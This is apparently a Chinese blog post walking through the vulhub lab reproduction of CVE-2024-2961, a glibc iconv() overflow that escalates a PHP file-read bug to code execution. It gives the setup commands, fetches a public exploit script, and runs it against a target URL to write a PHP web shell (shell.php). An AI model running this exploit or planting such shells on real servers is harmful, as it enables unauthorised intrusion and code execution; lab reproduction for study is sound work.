vulhub中PHP利用GNU C Iconv将文件读取变成RCE(CVE-2024-2961)

GNU C 是一个标准的ISO C依赖库。在GNU C中,iconv()函数2.39及以前存在一处缓冲区溢出漏洞,这可能会导致应用程序崩溃或覆盖相邻变量。

如果一个PHP应用中存在任意文件读取漏洞,攻击者可以利用`iconv()`的这个CVE-2024-2961漏洞,将其提升为代码执行漏洞。

漏洞复现

在使用原作者给出的[exploit](https://github.com/ambionics/cnext-exploits)前,你需要准备一个Linux环境和Python 3.10解释器。

安装依赖:

pip install pwntools

pip install https://github.com/cfreal/ten/archive/refs/heads/main.zip

然后从<https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py\>下载POC并执行:

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py

python cnext-exploit.py http://your-ip:8080/index.php "echo '<?=phpinfo();?>' > shell.php"

已经成功写入shell.php:

相关推荐
C_Liu_11 分钟前
C++:list
开发语言·c++
my rainy days18 分钟前
C++:友元
开发语言·c++·算法
小梁努力敲代码23 分钟前
java数据结构--List的介绍
java·开发语言·数据结构
云知谷1 小时前
【HTML】网络数据是如何渲染成HTML网页页面显示的
开发语言·网络·计算机网络·html
lly2024062 小时前
SQL ROUND() 函数详解
开发语言
大宝剑1702 小时前
python环境安装
开发语言·python
lly2024062 小时前
CSS3 多媒体查询
开发语言
天***88963 小时前
js封装一个双精度算法实现
开发语言·前端·javascript
.小小陈.3 小时前
数据结构2:单链表
c语言·开发语言·数据结构·笔记·学习方法